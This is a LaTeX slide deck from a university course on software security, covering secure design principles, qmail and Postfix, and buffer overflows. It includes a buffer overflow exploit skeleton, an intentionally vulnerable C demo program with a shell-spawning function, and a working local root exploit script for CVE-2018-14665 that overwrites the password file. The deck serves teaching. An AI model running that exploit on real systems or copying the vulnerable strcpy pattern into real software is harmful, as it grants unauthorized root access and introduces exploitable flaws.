\documentclass[Screen16to9,17pt]{foils}
\usepackage{zencurity-slides}
\externaldocument{software-security-exercises}
\selectlanguage{english}

\begin{document}

\mytitlepage
{2. Initial Overview of Software Security}
{KEA Kompetence OB2 Software Security}

\slide{Goals for today}

\hlkimage{6cm}{thomas-galler-hZ3uF1-z2Qc-unsplash.jpg}

Todays goals:
\begin{list2}
\item Realize that design AND implementation AND configuration can result in vulnerabilities
\item See the most simple buffer overflow
\item Get a sense of encryption, know TLS exist
\end{list2}

  Photo by Thomas Galler on Unsplash


\slide{Plan for today}

\begin{list1}
\item Subjects
\begin{list2}
\item Design vs Implementation
\item Common  Secure Design Issues
\item Input Validation
\end{list2}
\item Exercises
\begin{list2}
\item sslscan scan various sites for TLS settings, Qualys SSLLabs
\item Buffer Overflow 101
\end{list2}
\end{list1}

We will move the buffer overflow to another day, and play with JuiceShop instead!

\slide{Reading Summary}

Curriculum:
\begin{list1}
\item AoST chapter 2: How Vulnerabilities Get into All Software
\end{list1}

Related resources:
\begin{list1}
\item Secure Programming for Linux and Unix HOWTO, David Wheeler
\item \link{https://dwheeler.com/secure-programs/Secure-Programs-HOWTO.pdf}
\item \emph{A Graduate Course in Applied Cryptography} By Dan Boneh and Victor Shoup \emph{https://toc.cryptobook.us/} \url{https://crypto.stanford.edu/~dabo/cryptobook/BonehShoup_0_4.pdf}
\end{list1}


\slide{Goals: Data Security}

\hlkimage{18cm}{anderson-nine-principles-of-data-security.png}


Source:
\emph{Clinical system security: Interim guidelines}, Ross Anderson, 1996


\slide{Design vs Implementation}

Software vulnerabilities can be divided into two major categories:
\begin{list2}
\item Design vulnerabilities
\item Implementation vulnerabilities
\end{list2}

Even with a well-thought-out security design a program can contain implementation flaws.

\slide{Common Secure Design Issues}

\begin{list2}
\item Design must specify the security model's structure\\
Not having this written down is a common problem
\item Common problem AAA Authentication, Authorization, Accounting (book uses audited)
\item Weak or Missing Session Management
\item Weak or Missing Authentication
\item Weak or Missing Authorization
\end{list2}


\slide{Input Validation}

Missing or flawed input validation is the number one cause of many of the most severe vulnerabilities:
\begin{list2}
\item Buffer overflows - writing into control structures of programs, taking over instructions and program flow
\item SQL injection - executing commands and queries in database systems
\item Cross-site scripting - web based attack type
\item Recommend centralizing validation routines
\item Perform validation in secure context, controller on server
\item Secure component boundaries
\end{list2}

\slide{Weak Structural Security}

Our book describes more design flaws:
\begin{list2}
\item Large Attack surface
\item Running a Process at Too High a Privilege Level, dont run everything as root or administrator
\item No Defense in Depth, use more controls, make a strong chain
\item Not Failing Securely
\item Mixing Code and Data
\item Misplaced trust in External Systems
\item Insecure Defaults
\item Missing Audit Logs
\end{list2}

\slide{Secure Programming for Linux and Unix Howto}

\begin{list1}
\item More information about systems design and implementation can be found in the free resource:
\item Secure Programming for Linux and Unix HOWTO, David Wheeler
\item \link{https://dwheeler.com/secure-programs/Secure-Programs-HOWTO.pdf}
\item Chapter 5. Validate All Input details input validation in the context of Unix programs
\item Chapter 6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow)
\item Chapter 7. Design Your Program for Security
\end{list1}


\slide{Principle of Least Privilege}

\begin{list1}
\item {\bf Definition 14-1} The \emph{principle of least privilege} states that a subject should be given only those privileges that it needs in order to complete the task.
\item Also drop privileges when not needed anymore, relinquish rights immediately
\item Example, need to read a document - but not write.
\item Database systems can often provide very fine grained access to data
\end{list1}


\slide{Principle of Least Authority}

\begin{list1}
\item
\item {\bf Definition 14-2} The \emph{principle of least authority} states that a subject should be given only the authority that it needs in order to complete its task.
\item Closely related to principle of least privilege
\item Depend if there is distinction between \emph{permission} and \emph{authority}
\item Permission - what actions a process can take on objects directly
\item Authority - as determining what effects a process may have on an object, either directly or indirectly through its interactions with other processes or subsystems
\item Book uses the example of information flow, passing information to second subject that can write
\end{list1}


\slide{Principle of Fail-Safe defaults}

\begin{list1}
\item {\bf Definition 14-3} The \emph{principle of fail-safe defaults} states that, unless a subject is given explicit access to an object, it should be denied access to that object.
\item Default access \emph{none}
\item In firewalls default-deny - that which is not allowed is prohibited
\item Newer devices today can come with no administrative users, while older devices often came with default admin/admin users
\item Real world example, OpenSSH config files that come with \verb+PermitRootLogin no+
\end{list1}


\slide{Principle of Economy of Mechanism}

\begin{list1}
\item {\bf Definition 14-4} The \emph{principle of economy of mechanism} states that security mechanisms should be as simple as possible.
\item Simple $->$ fewer complications $->$ fewer security errors
\item Use WPA passphrase instead of MAC address based authentication
\item
\end{list1}


\slide{Principle of Complete Mediation}

\begin{list1}
\item {\bf Definition 14-5} The \emph{principle of complete mediation} requires that all accesses to objects be checked to ensure that they are allowed.
\item Always perform check
\item Time of check, time of use
\item Example Unix file descriptors - access check first, then can be reused in the future
\item Caching can be bad.
\end{list1}


\slide{Principle of Open Design}

\hlkimage{8cm}{debath-stego.png}

Source: picture from \link{https://www.cs.cmu.edu/~dst/DeCSS/Gallery/Stego/index.html}
\begin{list1}
\item {\bf Definition 14-6} The \emph{principle of open design} states that the security of a mechanism should not depend on the secrecy of its design or implementation.
\item Content Scrambling System (CSS) used on DVD movies
\item Mobile data encryption  A5/1 key - see next page
\end{list1}

\slide{Mobile data encryption  A5/1 key}

\begin{quote}
  Real Time Cryptanalysis of A5/1 on a PC
Alex Biryukov * Adi Shamir ** David Wagner ***

  Abstract. A5/1 is the strong version of the encryption algorithm used by about 130 million GSM customers in Europe to protect the over-the-air privacy of their cellular voice and data communication. The best published attacks against it require between 240 and 245 steps. ...
  In this paper we describe new attacks on A5/1, which are based on subtle flaws in the tap structure of the registers, their noninvertible clocking mechanism, and their frequent resets. After a 248 parallelizable data preparation stage (which has to be carried out only once), the actual attacks can be {\bf carried out in real time on a single PC.}

  The first attack requires the output of the A5/1 algorithm during the first two minutes of the conversation, and computes the key in about one second. The second attack requires the output of the A5/1 algorithm during about two seconds of the conversation, and computes the key in several minutes.
  ...
  The approximate design of A5/1 was leaked in 1994, and the exact design of both A5/1 and A5/2 was reverse engineered by Briceno from an actual GSM telephone in 1999 (see [3]).
\end{quote}
Source: \link{http://cryptome.org/a51-bsw.htm}


\slide{Principle of Separation of Privilege}

\hlkimage{4cm}{security-layers-1-uk.pdf}
\begin{list1}
\item {\bf Definition 14-7} The \emph{principle of separation of privilege} states that a system should not grant permission based on a single condition.
\item Company checks, CEO fraud
\item Programs like \emph{su} and \emph{sudo} often requires specific group membership and password
\end{list1}


\slide{Principle of Least Common Mechanism}

\begin{list1}
\item {\bf Definition 14-8} The \emph{principle of least common mechanism} states that mechanisms used to access resources should not be shared.
\item Minimize number of shared mechanisms and resources
\item Also mentions stack protection, randomization
\end{list1}



\slide{Principle of Least Astonishment}

\begin{list1}
\item {\bf Definition 14-9} The \emph{principle of least astonishment} states that security mechanisms should be designed so that users understand the reason that the mechanism works they way it does and that using the mechanism is simple.
\item Security model must be easy to understand and targetted towards users and system administrators
\item Confusion may undermine the security mechanisms
\item Make it easy and as intuitive as possible to use
\item Make output clear, direct and useful\\
Exception user supplies wrong password, tell login failed but not if user or password was wrong
\item Make documentation correct, but the program best
\item Psychological acceptability - should not make resource more difficult to access
\end{list1}






\slide{Qmail Security}

\begin{quote}
The qmail security guarantee
In March 1997, I took the unusual step of publicly offering
\$500 to the first person to publish a verifiable security hole
in the latest version of qmail: for example, a way for a user
to exploit qmail to take over another account. My offer still
stands. Nobody has found any security holes in qmail. I
hereby increase the offer to \$1000.
\end{quote}
\emph{Some thoughts on security after ten years of qmail 1.0},
Daniel J. Bernstein

\begin{list2}
\item Started out of need and security problems in existing Sendmail
\item Bug bounty early on. Donald Knuth has similar for his books
\end{list2}

\slide{Qmail Security Paper, some answers}

\begin{list2}
\item Answer 1: eliminating bugs $->$ Enforcing explicit data flow, Simplifying integer semantics, Avoiding parsing
\item Answer 2: eliminating code  $->$ Identifying common functions, Reusing network tools, Reusing access controls, Reusing the filesystem
\item Answer 3: eliminating trusted code $->$ Accurately measuring the TCB, Isolating single-source transformations, Delaying multiple-source merges, Do we really need a small TCB?
\end{list2}

\slide{Qmail vs Postfix}

\begin{quote}
I failed to place any of the qmail code into untrusted prisons. Bugs anywhere in the code could have been security holes. The way that qmail survived this failure was by having very few bugs, as discussed in Sections 3 and 4.
\end{quote}
\emph{Some thoughts on security after ten years of qmail 1.0},
Daniel J. Bernstein

\begin{list2}
\item This is NOT a comlete comparison of Qmail and Postfix \link{http://www.postfix.org/}!
\item Postfix is comprised of many processes and modules. These modules typically are also chrooted and report back status only through very restricted interfaces
\item It is also possible to turn off many components, allowing the system run with less code
\item No Postfix program is setuid, all things are run by a master control process. A small setgid program used for mail submission - writing into the queue directory
\end{list2}

Source: being a Postfix user and \emph{Secure Coding: Principles and Practices}
Eftir Mark Graff, Kenneth R. Van Wyk, June 2009




\slide{Vulnerability Analysis}


\begin{list1}
\item \emph{Vulnerability} or security flaw
\item Exploiting the vulnerability happens by an attacker
\item A program or script used for this is called an \emph{exploit}
\end{list1}



\slide{Technically what is hacking}

\hlkimage{12cm}{buffer-overflow-3.pdf}



\slide{Trinity breaking in}

\hlkimage{14cm}{trinity-nmapscreen-hd-cropscale-418x250.jpg}
Very realistic -- comparable to hacking:\\
\link{https://nmap.org/movies/}\\
\link{https://youtu.be/51lGCTgqE_w}



\slide{Hacking is magic}

\hlkimage{5cm}{wizard_in_blue_hat.png}

\vskip 1 cm

\centerline{Hacking looks like magic}


\slide{Hacking is not magic}

\hlkimage{15cm}{ninjas.png}

\vskip 1 cm
\centerline{Hacking only demands ninja training and knowledge others don't have}





\slide{Buffer overflows a C problem}

\begin{list1}
\item {\bfseries A buffer overflow} is what happens when writing more data than allocated in some area of memory. Typically the program will crash, but under ce
rtain circumstances an attacker can write structures allowing take over of return addresses, parameters for system calls or program execution.
\item {\bfseries Stack protection} is today used as a generic term for multiple technologies used in operating systems, libraries, compilers etc. that protect t
he stack and other structures from being overwritten or changed through buffer overflows. StackGuard
and Propolice are examples of this.
\end{list1}

Today we will not go more into detail about this, suffice it to say modern operating systems really employ a lot of methods for making buffer overflows harder and less likely to succeed. OpenBSD even relink the kernel on installation to randomize addresses.

\slide{Buffers and stacks, simplified}

\hlkimage{18cm}{buffer-overflow-1.pdf}

\begin{minted}[fontsize=\small]{c}
main(int argc, char **argv)
{      char buf[200];
        strcpy(buf, argv[1]);
        printf("%s\n",buf);
}
\end{minted}



\slide{Overflow -- segmentation fault}

\hlkimage{18cm}{buffer-overflow-2.pdf}


\begin{list2}
\item Bad function overwrites return value!
\item Control return address
\item Run shellcode from buffer, or from other place
\end{list2}



\slide{Exploits -- abusing a vulnerability}

\begin{alltt}\footnotesize
$buffer = "";
$null = "\textbackslash{}x00";
$nop = "\textbackslash{}x90";
$nopsize = 1;
$len = 201; // what is needed to overflow, maybe 201, maybe more!
$the_shell_pointer = 0x01101d48; // address where shellcode is
# Fill buffer
for ($i = 1; $i < $len;$i += $nopsize) \{
    $buffer .= $nop;
\}
$address = pack('l', $the_shell_pointer);
$buffer .= $address;
exec "$program", "$buffer";
\end{alltt}

\begin{list2}
\item Exploit/exploit program are designed to exploit a specific vulnerability, often a specific version on a specific release on a specific CPU architecture
\item Might be a 5 line program written in Perl, Python or a C program
\item Today we often see them as modules written for Metasploit allowing it to be combined with different payloads
\end{list2}

\slide{How to find these buffer overflows }

\begin{list1}
\item Black box testing
\item Closed source reverse engineering
\item White box testing
\item Open source read and analyze the code -- tools exist
\item Trial and error -- fuzzing inputs to a program, save crashes, analyze them
\item Reverse engineer specific updates, so this part was changed, nice -- this is where the bug is
\end{list1}


\slide{Principle of Least Privilege}

\begin{list1}
\item Many programs need privileges to perform some function, but sometimes they don't really need it
\item {\bf Definition 14-1} The \emph{principle of least privilege} states that a subject should be given only those privileges that it needs in order to complete the task.\\
Source:  \emph{Computer Security: Art and Science}, 2nd edition, Matt Bishop

\item Also drop privileges when not needed anymore, relinquish rights immediately
\item Example, need to read a document - but not write.
\item Database systems can often provide very fine grained access to data
\end{list1}

\slide{Privilege Escalation}
\begin{list1}
\item {\bfseries Privilege escalation} is when a privileged program is vulnerable and can be abused to escalate privileges. Example from unauthenticated user to a user account, or from regular user and becoming administrator (root on Unix) or even SYSTEM on Windows.
\item Kernels and drivers are also often susceptible to this
\end{list1}


\slide{Local vs. remote exploits}

\begin{list1}
\item {\bfseries Local vs. remote} exploit describe if the attack is done over some network, or locally on a system
\item {\bfseries Remote root exploit}
are the worst kind, since they work over the network, and gives complete control aka root on Unix
\item {\bfseries Zero-day exploits} is a term used for those exploits that suddenly pop up, without previous warning. Often found during incident response at some network. We prefer that security researchers that discover a vulnerability uses a {\bf responsible disclosure} process that involves the vendor .
\end{list1}

\slide{CVE-2018-14665 Multiple Local Privilege Escalation}

\begin{alltt}\footnotesize
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh'
 -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -
\end{alltt}
Code from: \url{https://weeraman.com/x-org-security-vulnerability-cve-2018-14665-f97f9ebe91b3}

\begin{list2}
\item The X.Org project provides an open source implementation of the X Window System. X.Org security advisory: October 25, 2018
\url{https://lists.x.org/archives/xorg-announce/2018-October/002927.html}

%\item Example exploit method, write cron job - wait for shell:\\
%\url{https://www.exploit-db.com/exploits/45742}
\end{list2}



\slide{Zero day 0-day vulnerabilities}

\begin{quote}

  Project Zero's team mission is to "make zero-day hard", i.e. to make it more costly to discover and exploit security vulnerabilities. We primarily achieve this by performing our own security research, but at times we also study external instances of zero-day exploits that were discovered "in the wild". These cases provide an interesting glimpse into real-world attacker behavior and capabilities, in a way that nicely augments the insights we gain from our own research.

  Today, we're sharing our tracking spreadsheet for publicly known cases of detected zero-day exploits, in the hope that this can be a useful community resource:

  Spreadsheet link: 0day "In the Wild"\\
  \link{https://googleprojectzero.blogspot.com/p/0day.html}
\end{quote}

\begin{list2}
\item Not all vulnerabilities are found and reported to the vendors
\item Some vulnerabilities are exploited \emph{in the wild}
\end{list2}

\slide{Demo: Insecure programming buffer overflows 101}


\begin{list2}
\item Small demo program \verb+demo.c+ with built-in shell code, function \verb+the_shell+
\item Compile:
\verb+gcc -o demo demo.c+
\item Run program
\verb+./demo test+
\item Goal: Break and insert return address
\end{list2}

\begin{minted}[fontsize=\footnotesize]{c}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv)
{      char buf[10];
        strcpy(buf, argv[1]);
        printf("%s\n",buf);
}
int the_shell()
{  system("/bin/dash");  }
\end{minted}

NOTE: this demo is using the dash shell, not bash - since bash drops privileges and won't work.

\slide{GDB GNU Debugger}

\begin{list1}
\item GNU compileren and debugger are OK for this, can fit on a slide!
\item Lots of other debuggers exist
\item Try \verb+gdb ./demo+ and run the program with some input from the \emph{gdb prompt}
using \verb+run 1234+
\item When you realize the input overflows the buffer, crashed program execution you can work towards getting the address from \verb+nm demo+ of the function \verb+the_shell+
   -- and into the program
\item Use: \verb+nm demo | grep shell+
\item The art is to generate a string long enough to overflow, and having the correct data, so the address ends up in the right place
\item Perl can be used for generating AA...AAA like this, \\
with back ticks, \verb+`perl -e "print 'A'x10"`+
\end{list1}



\slide{Debugging C with GDB}

\begin{list1}
\item Test with input
\begin{list2}
\item \verb+./demo longstringwithalotofdatyacrashtheprogram+
\item \verb+gdb demo+ followed by\\
\verb+run AAAAAAAAAAAAAAAAAAAAAAAAAAAAA+

\item Compile program: \verb+gcc -o demo demo.c+
\item Run program \verb+./demo 123456...7689+ until it dies
\item Then retry in GDB
\end{list2}
\end{list1}

\slide{GDB output}

\begin{alltt}\footnotesize
hlk@bigfoot:demo$ gdb demo
GNU gdb 5.3-20030128 (Apple version gdb-330.1) (Fri Jul 16 21:42:28 GMT 2004)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "powerpc-apple-darwin".
Reading symbols for shared libraries .. done
(gdb) {\bf run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
Starting program: /Volumes/userdata/projects/security/exploit/demo/demo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Reading symbols for shared libraries . done
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal EXC_BAD_ACCESS, Could not access memory.
{\bf 0x41414140} in ?? ()
(gdb)
\end{alltt}

\slide{GDB output Debian}

\begin{alltt}\footnotesize
hlk@debian:~/demo$ gdb demo
GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
...
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from demo...(no debugging symbols found)...done.
(gdb) run `perl -e "print 'A'x24"`
Starting program: /home/hlk/demo/demo `perl -e "print 'A'x24"`
AAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb)
\end{alltt}


\exercise{ex:bufferoverflow}


\slidenext{}


\end{document}
